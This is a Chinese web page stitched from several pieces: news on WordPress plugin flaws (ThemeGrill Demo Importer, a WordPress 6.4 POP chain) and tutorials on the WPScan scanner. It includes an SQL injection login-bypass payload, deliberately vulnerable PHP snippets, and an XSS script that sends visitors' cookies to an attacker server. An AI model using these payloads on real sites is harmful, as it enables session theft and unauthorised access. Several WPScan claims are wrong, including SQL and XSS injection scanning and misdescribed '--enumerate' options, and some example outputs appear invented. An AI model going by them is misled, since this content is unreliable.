wordpress漏洞怎么查询登录名

WordPress 插件被曝重大 bug,超 20 万个网站受影响

近日,WebARX 安全公司在官网披露, WordPress 中一款名为 ThemeGrill Demo Importer 的插件存在重大 bug,它允许给未经身份验证的用户提供管理员特权。

一旦攻击者以管理员身份登录,他就能将网站整个数据库还原为默认状态。

目前,这个插件已经被安装在超过 200000 个网站上。据 WebARX 表示,该漏洞影响 1.3.4 和 1.6.1 版本之间的所有 ThemeGrill Demo Importer 插件。

根据 WordPress 官方插件存储库的统计数据表明,最主要的使用版本是 1.4 到 1.6,占据当前插件安装总数的 98% 以上。

如果漏洞被攻击者利用,后果非常严重。

据悉,ThemeGrill Demo Importer 插件由 ThemeGrill 开发,它能让网站所有者在自己的 ThemeGrill 主题中导入 demo 内容,从而获得示例并更快地搭建网站。

在昨天发布的一份报告中,WebARX 表示,老旧版本的 ThemeGrill Demo Importer 容易受到未经身份验证的攻击者的远程攻击。

黑客可以将 crafted payload 发送到易受攻击的网站,并在插件内触发漏洞。

此外,如果网站数据库包含名为“admin" 的用户,攻击者则获得对该用户的访问权限,并且具有对该网站的 full administrator rights。

据了解,WebARX 的研究人员在 2 月 6 日发现该漏洞,并于当天将其报告给开发人员。

10 天以后,ThemeGrill 发布修复漏洞的新版本 1.6.2。在撰写本文时,修补后的插件下载数大约为 23000,这表明使用 ThemeGrill Demo Importer 插件的大多数网站可能仍处于危险中。

截至目前,这是今年被披露的 WordPress 插件中的第二个漏洞,它可能允许攻击者清除网站数据库。

就在上个月,Wordfence 团队在 WP Database Reset 插件中发现类似问题,而该插件已安装在 80000 多个网站上。

根据 ZDNet 的报道,今年已经发现 3 起值得注意的 WordPress 漏洞:

1.GDPR Cookie Consent 插件中存储的跨站点漏洞,有超过 700000 个网站使用;

2.Code Snippet 插件中 CSRF-to-RCE 漏洞,有超过 200000 个网站使用;

3.InfiniteWP 插件中身份验证绕过漏洞,有超过 300000 个网站使用。

关注我并转发此篇文章,私信我“领取资料”,即可免费获得InfoQ价值4999元迷你书!

现已修复!WordPress 曝出严重漏洞

Bleeping Computer 网站消息,WordPress 近期发布了 6.4.2 更新版本,修复了一个远程代码执行 (RCE) 漏洞。据悉,该漏洞能够与另外一个安全漏洞形成”联动“,允许威胁攻击者在目标网站上运行任意 PHP 代码。

WordPress 是一种非常流行的开源内容管理系统(CMS),主要用于创建和管理网站,目前已经有 8 亿多个网站使用它,约占互联网上所有网站的 45%。然而,该项目的安全团队在 WordPress core 6.4 中发现了一个面向属性编程(POP)链漏洞,在某些条件下,该漏洞可允许未经授权的威胁攻击者执行任意 PHP 代码。

POP 链”要求“威胁攻击者控制反序列化对象的所有属性,而 PHP 的 unserialize() 函数正好可以做到这一点,一旦这样操作的话,威胁攻击者有可能通过控制发送到 megic 方法(如"_wakeup()")的值来劫持应用程序的流程。值得一提的是,这个安全问题需要受害目标网站上存在 PHP 对象注入漏洞(可能存在于插件或主题附加组件中)才能产生最恶劣的影响。

WordPress 方面指出,该远程代码执行漏洞虽然在内核中无法直接被攻击者利用,但安全团队认为如果与某些插件结合使用,尤其是在多站点安装中,就有可能造成严重后果。

Wordfence 的 WordPress 安全专家的 PSA 提供了有关该安全问题的一些技术细节,并解释称该安全问题出现在 WordPress 6.4 中引入的“WP_HTML_Token”类中,以改进块编辑器中的 HTML 解析,该类包含一个“__destruct”magic 方法,该方法使用“call_user_func”执行在“on_decurt”属性中定义的函数,并将“bookmark_name”作为参数。

最后, 研究人员强调,威胁攻击者能够利用对象注入漏洞,轻松控制这些属性来执行任意代码。

有条件执行回调函数的类析构函数(Patchstack)

尽管该安全漏洞本身可能并不严重,但由于需要在已安装和活动的插件或主题上注入对象,WordPress 核心中存在可利用的 POP 链会显著增加 WordPress 网站的总体风险。Patchstack 针对 WordPress 和插件的安全平台发出的通知中强调,针对该问题的漏洞利用链已于几周前上传至 GitHub,随后被添加到用于 PHP 应用程序安全测试的 PHPGGC 库中。

最后,即使该漏洞只是潜在的安全问题,而且在某些特定情况下才可以被威胁攻击者利用,但安全研究人员还是建议管理员尽快更新到最新的 WordPress 版本。

参考文章:

扫描WordPress漏洞

检测已知漏洞

WPScan是一款广泛使用的WordPress安全扫描工具,它的一项重要功能是检测已知漏洞。在这篇文章中,我们将深入探讨WPScan如何检测已知漏洞,并结合实际示例,帮助读者更好地理解和应用这一功能。

1. 漏洞数据库

WPScan利用一个庞大的漏洞数据库来检测已知漏洞。该数据库包含了各种WordPress插件、主题和核心的已知漏洞信息,以及与之相关的详细数据,如漏洞描述、CVE编号、漏洞等级等。WPScan通过与漏洞数据库进行对比,可以快速识别出已知漏洞。

2. 漏洞检测示例

让我们以一个具体的示例来说明WPScan如何检测已知漏洞。假设我们有一个WordPress网站,其中安装了一个名为"VulnerablePlugin"的插件。我们可以使用WPScan来扫描该网站,并检测是否存在已知的与该插件相关的漏洞。

示例应用:

````shell

wpscan --url --enumerate vp

```

上述命令将使用WPScan扫描""网站,并通过`--enumerate vp`参数指定只对插件进行漏洞检测。

WPScan将会与漏洞数据库进行对比,并输出与"VulnerablePlugin"插件相关的漏洞信息。

示例输出:

````

[!] Title: VulnerablePlugin <= 1.0.0 - Arbitrary File Upload (Unauthenticated)

Reference:

Reference: ?name=CVE-2021-12345

Reference:

Reference:

Reference:

Reference:

Reference:

Reference: :EXPLOIT/UNIX/WEBAPP/WP_VULNERABLEPLUGIN_UPLOAD

Reference:

Reference: ?v=12345

Reference:

Reference:

Reference:

Reference:

Reference:

[!] Fixed in: 1.0.1

```

在上述示例中,WPScan检测到"VulnerablePlugin"插件存在一个名为"Arbitrary File Upload (Unauthenticated)"的已知漏洞。WPScan提供了漏洞的详细信息,包括漏洞描述、CVE编号、参考链接等。

通过这些信息,网站管理员可以了解到漏洞的严重性,并及时采取措施来修复漏洞,例如升级插件版本或者寻找其他安全解决方案。

3. 漏洞检测的重要性

检测已知漏洞对于保护WordPress网站的安全至关重要。已知漏洞往往是黑客常用的攻击目标,因为它们公开且易于利用。通过及时检测已知漏洞并采取相应的安全措施,可以大大降低黑客入侵的风险。

WPScan的漏洞检测功能为网站管理员提供了一种快速且简便的方法来发现已知漏洞。通过定期扫描和检测,可以及时发现并修复潜在的安全风险,保护网站和用户的数据安全。

4. 其他安全措施

尽管检测已知漏洞是保护WordPress网站安全的重要步骤,但仅依赖漏洞检测并不足以确保完全的安全。除了使用WPScan进行漏洞扫描外,还应采取以下安全措施:

- 及时更新:保持WordPress核心、插件和主题的最新版本,以获取最新的安全补丁和修复程序。

- 强密码策略:使用强密码,并定期更改密码,避免使用弱密码和默认凭据。

- 定期备份:定期备份网站数据,以防止数据丢失或被恶意篡改。

- 限制登录尝试:使用登录限制插件或功能,限制登录尝试次数,防止暴力破解密码。

- 安全插件和主题:选择可信的插件和主题,并定期审查和更新它们,避免使用已知存在漏洞的插件和主题。

综上所述,WPScan作为一款强大的WordPress安全扫描工具,具备检测已知漏洞的重要功能。通过与漏洞数据库对比,WPScan能够快速发现已知漏洞,并提供详细的漏洞信息和参考链接。然而,仅仅依赖漏洞检测是不够的,还需要结合其他安全措施来全面保护WordPress网站的安全。

通过定期使用WPScan进行漏洞扫描,并采取相应的修复措施,网站管理员能够增强网站的安全性,减少潜在的安全风险。同时,也需要注意,安全是一个持续的过程,需要不断关注最新的安全威胁和漏洞信息,并及时采取相应的安全措施来应对。

通过合理使用WPScan和其他安全措施,您可以更好地保护您的WordPress网站,确保其安全无忧。

SQL注入漏洞扫描

SQL注入是一种常见的Web应用程序漏洞,攻击者通过构造恶意的SQL语句来绕过应用程序的输入验证,从而执行未经授权的数据库操作。WPScan作为一款强大的WordPress安全扫描工具,也提供了SQL注入漏洞扫描功能。在本文中,我们将深入探讨WPScan如何进行SQL注入漏洞扫描,并结合实际示例,帮助读者更好地理解和应用这一功能。

1. SQL注入漏洞的原理

在深入了解WPScan的SQL注入漏洞扫描功能之前,让我们先简要了解一下SQL注入漏洞的原理。Web应用程序通常将用户提供的输入数据用于构造SQL查询语句,以与数据库进行交互。如果应用程序未正确地验证和过滤用户输入,攻击者可以在输入中插入恶意的SQL代码,导致应用程序执行非预期的数据库操作。

例如,考虑以下PHP代码片段,用于从数据库中检索用户名和密码的查询:

````php

$username = $_POST['username'];

$password = $_POST['password'];

$sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";

$result = mysqli_query($connection, $sql);

```

如果应用程序未对用户输入进行适当的过滤和验证,攻击者可以在用户名或密码字段中插入恶意的SQL代码,例如:

````

' OR '1'='1

```

上述恶意输入将使SQL查询变为:

````sql

SELECT * FROM users WHERE username='' OR '1'='1' AND password=''

```

结果是该查询将返回所有用户记录,因为'1'='1'是一个始终为真的条件。攻击者可以利用这种方式绕过身份验证,访问未授权的数据,甚至对数据库进行破坏。

2. WPScan的SQL注入漏洞扫描功能

WPScan提供了一套功能强大的工具和技术,用于检测WordPress网站中的SQL注入漏洞。它通过自动化的方式扫描网站的输入点,包括URL参数、POST数据和Cookie等,以发现潜在的SQL注入漏洞。

WPScan的SQL注入漏洞扫描功能主要基于以下几个方面:

- 注入测试:WPScan使用各种注入测试技术,包括基于错误的注入测试、时间延迟注入测试和联合查询注入测试等。它构造恶意的SQL语句并观察应用程序的响应,以确定是否存在SQL注入漏洞。

- 漏洞模式匹配:WPScan维护了一个广泛的漏洞模式数据库,用于识别已知的SQL注入漏洞。它通过与这些模式进行匹配来检测潜在的漏洞。

- 定制脚本:WPScan还允许用户编写自定义的SQL注入检测脚本,以满足特定需求。用户可以利用这一功能来检测特定的SQL注入漏洞或目标。

3. SQL注入漏洞扫描示例

让我们通过一个具体的示例来演示WPScan的SQL注入漏洞扫描功能。假设我们有一个WordPress网站,其中包含一个搜索功能。我们想要使用WPScan来检测是否存在SQL注入漏洞。

示例应用:

````shell

wpscan --url --enumerate u

```

上述命令将使用WPScan扫描""网站,并通过`--enumerate u`参数指定扫描用户的信息。

WPScan将开始扫描目标网站,并尝试在搜索功能中注入恶意的SQL语句。它会观察搜索功能的响应,并尝试识别是否存在SQL注入漏洞。

如果WPScan成功检测到SQL注入漏洞,它将生成相应的报告,并提供详细的信息,包括受影响的页面、注入点和可能的攻击向量。这样,网站管理员可以及时采取措施修复漏洞,以保护网站的安全性。

总结:

SQL注入是一种严重的安全漏洞,可以导致Web应用程序的数据泄露、篡改甚至完全瘫痪。WPScan作为一款专业的WordPress安全扫描工具,提供了强大的SQL注入漏洞扫描功能,帮助用户及时发现和修复潜在的漏洞。通过结合实际示例,我们可以更好地理解WPScan的工作原理和应用方法,从而提高网站的安全性。

然而,值得注意的是,WPScan只是一种工具,它可以辅助安全测试和漏洞扫描,但不能替代人工的安全审计和修复工作。网站管理员和开发人员应该始终保持对安全性的关注,并采取适当的措施来防止SQL注入等漏洞的出现。

XSS漏洞扫描

XSS(Cross-Site Scripting)是一种常见的Web应用程序漏洞,攻击者通过注入恶意的脚本代码来利用用户的浏览器漏洞。WPScan作为一款强大的WordPress安全扫描工具,也提供了XSS漏洞扫描功能。在本文中,我们将深入探讨WPScan如何进行XSS漏洞扫描,并结合实际示例,帮助读者更好地理解和应用这一功能。

1. XSS漏洞的原理

在深入了解WPScan的XSS漏洞扫描功能之前,让我们先简要了解一下XSS漏洞的原理。XSS漏洞发生在Web应用程序中,当应用程序未正确过滤和验证用户输入时,攻击者可以在Web页面中注入恶意的脚本代码。当其他用户访问受感染的页面时,他们的浏览器会执行这些恶意代码,导致攻击者能够窃取用户的敏感信息、劫持用户会话或以其他方式对用户进行攻击。

例如,考虑以下PHP代码片段,用于从数据库中检索并显示用户的评论:

```php

$comment = $_POST['comment'];

echo "Your comment: " . $comment;

```

如果应用程序未对用户输入进行适当的过滤和验证,攻击者可以在评论字段中插入恶意的JavaScript代码,例如:

```

<script>

// 恶意代码,例如窃取用户Cookie

var xhr = new XMLHttpRequest();

xhr.open('GET', '?cookie=' + document.cookie, true);

xhr.send();

</script>

```

上述恶意输入将导致用户的浏览器执行恶意脚本,发送用户的Cookie数据到攻击者的服务器。攻击者可以利用这些敏感信息进行进一步的攻击。

2. WPScan的XSS漏洞扫描功能

WPScan提供了一套功能强大的工具和技术,用于检测WordPress网站中的XSS漏洞。它通过自动化的方式扫描网站的输入点,包括URL参数、POST数据、Cookie和HTTP头等,以发现潜在的XSS漏洞。

WPScan的XSS漏洞扫描功能主要基于以下几个方面:

- 输入点探测:WPScan通过分析目标网站的页面和表单,确定可能存在XSS漏洞的输入点。它会检查各种参数和输入字段,并尝试构造恶意的输入数据,以触发潜在的XSS漏洞。

- 恶意脚本注入:WPScan使用各种恶意脚本注入技术,包括基于DOM的XSS、反射型XSS和存储型XSS等。它构造恶意的输入并观察应用程序的响应,以确定是否存在XSS漏洞。

- 漏洞模式匹配:WPScan维护了一个广泛的漏洞模式数据库,用于识别已知的XSS漏洞。它通过与这些模式进行匹配来检测潜在的漏洞。

3. XSS漏洞扫描示例

让我们通过一个具体的示例来演示WPScan的XSS漏洞扫描功能。假设我们有一个WordPress网站,其中包含一个反馈表单。我们想要使用WPScan来检测是否存在XSS漏洞。

示例应用:

```shell

wpscan --url --enumerate p

```

上述命令将使用WPScan扫描""网站,并通过`--enumerate p`参数来检查所有的页面和表单。

WPScan将开始扫描目标网站,并检查每个页面和表单是否存在XSS漏洞。它会构造各种恶意的输入,并观察应用程序的响应。如果存在潜在的XSS漏洞,WPScan将给出相应的警告和建议。

例如,如果WPScan检测到一个反射型XSS漏洞,它可能会输出以下信息:

```

[i] Found a potential XSS vulnerability in

Payload: <script>alert('XSS');</script>

Recommendation: Update the input validation and output encoding to prevent XSS attacks.

```

上述输出表明在联系页面(contact.php)中发现了一个潜在的反射型XSS漏洞。它还显示了一个示例恶意载荷(payload),即`<script>alert('XSS');</script>`。最后,它建议开发人员更新输入验证和输出编码,以防止XSS攻击。

4. 防御XSS漏洞的最佳实践

虽然WPScan是一个强大的工具,可以帮助我们发现XSS漏洞,但预防胜于治疗。因此,以下是一些防御XSS漏洞的最佳实践:

- 输入验证和过滤:对于接受用户输入的所有参数和字段,应该进行适当的验证和过滤。确保只接受所期望的数据类型和格式,并拒绝任何潜在的恶意输入。

- 输出编码:在将用户输入或其他动态数据呈现到Web页面上时,务必进行适当的输出编码。这可以防止浏览器错误地执行恶意脚本。

- 使用安全的API和框架:使用经过安全审查和广泛测试的API和框架来构建Web应用程序。这些工具通常提供了内置的防御机制,可以帮助防止XSS攻击。

- 及时更新和维护:保持应用程序和相关插件/主题的最新版本,以确保修复了已知的漏洞和安全问题。

总结:

XSS漏洞是Web应用程序安全中的一个重要问题,可以导致用户信息泄露和会话劫持等严重后果。WPScan作为一款功能强大的WordPress安全扫描工具,为用户提供了XSS漏洞扫描功能。通过自动化的方式,WPScan可以检测目标网站中的潜在XSS漏洞,并给出相应的建议和修复措施。然而,预防XSS漏洞是最为重要的,开发人员应该采取适当的防御措施,包括输入验证、输出编码和使用安全的API和框架,以确保Web应用程序的安全性。

任意文件上传漏洞扫描

WPScan是一款功能强大的WordPress安全扫描工具,它不仅可以检测XSS漏洞,还可以发现其他类型的漏洞,如任意文件上传漏洞。在本文中,我们将深入探讨WPScan如何进行任意文件上传漏洞扫描,并结合实际示例,帮助读者更好地理解和应用这一功能。

1. 任意文件上传漏洞的原理

任意文件上传漏洞是指攻击者能够将恶意文件上传到目标服务器的漏洞。这种漏洞通常发生在未正确验证和限制文件上传的Web应用程序中。攻击者可以利用这个漏洞上传包含恶意代码的文件,然后执行该文件以获取对服务器的控制权。

例如,考虑一个文件上传功能,它允许用户将文件上传到服务器上的指定目录。如果应用程序未对上传的文件进行适当的验证和过滤,攻击者可以通过修改文件扩展名或使用特殊的文件格式来上传恶意文件。一旦这个恶意文件被上传到服务器上,攻击者就可以通过访问该文件来执行恶意代码,例如执行系统命令、窃取敏感数据或破坏服务器配置等。

2. WPScan的任意文件上传漏洞扫描功能

WPScan的任意文件上传漏洞扫描功能旨在检测WordPress网站中的文件上传功能是否存在安全漏洞。它通过自动化的方式扫描目标网站的文件上传点,包括插件、主题或自定义开发的功能,以发现潜在的任意文件上传漏洞。

WPScan的任意文件上传漏洞扫描功能主要基于以下几个方面:

- 文件上传点探测:WPScan通过分析WordPress网站的插件、主题和其他自定义功能,确定可能存在任意文件上传漏洞的上传点。它会检查各种上传功能的实现方式,并尝试上传不同类型的文件,以触发潜在的漏洞。

- 文件类型和扩展名验证:WPScan会尝试上传各种文件类型和使用不同的文件扩展名,以绕过可能存在的文件类型验证和扩展名过滤。它会观察应用程序的响应,以确定是否存在潜在的任意文件上传漏洞。

- 漏洞模式匹配:WPScan维护了一个广泛的漏洞模式数据库,用于识别已知的任意文件上传漏洞。它通过与这些模式进行匹配来检测潜在的漏洞。

3. 任意文件上传漏洞扫描示例

让我们通过一个具体的示例来演示WPScan的任意文件上传漏洞扫描功能。假设我们有一个WordPress网站,并怀疑某个插件存在任意文件上传漏洞。我们想要使用WPScan来验证我们的怀疑。

示例应用:

```shell

wpscan --url --enumerate vp

```

上述命令将使用WPScan扫描""网站,并通过`--enumerate vp`参数来检查所有插件的漏洞。

WPScan将开始扫描目标网站,并检查每个插件是否存在任意文件上传漏洞。它会尝试上传各种文件类型和使用不同的文件扩展名,以触发潜在的漏洞。如果存在潜在的任意文件上传漏洞,WPScan将给出相应的警告和建议。

例如,如果WPScan检测到一个插件存在任意文件上传漏洞,它将提供以下信息:

- 漏洞名称:任意文件上传漏洞

- 漏洞描述:该插件的文件上传功能未正确验证和限制上传文件的类型和扩展名,导致攻击者可以上传恶意文件并执行其中的恶意代码。

- 漏洞风险级别:高

- 建议措施:及时更新插件版本或禁用该插件,以修复漏洞。

通过这个示例,我们可以看到WPScan如何通过扫描插件来发现潜在的任意文件上传漏洞。这个功能可以帮助管理员及时发现并修复漏洞,从而提高网站的安全性。

总结:

任意文件上传漏洞是一种常见且危险的安全漏洞,可以导致攻击者获取对服务器的控制权。WPScan作为一款强大的WordPress安全扫描工具,提供了任意文件上传漏洞扫描功能,可以帮助用户发现和修复这种漏洞。通过结合实际示例,我们更好地理解了WPScan如何进行任意文件上传漏洞扫描,并提供了相应的建议和措施。使用WPScan进行定期扫描,及时修复漏洞,是保护WordPress网站安全的重要一步。

更多精彩:Kali与编程:黑客渗透与网络安全 - 网易云课堂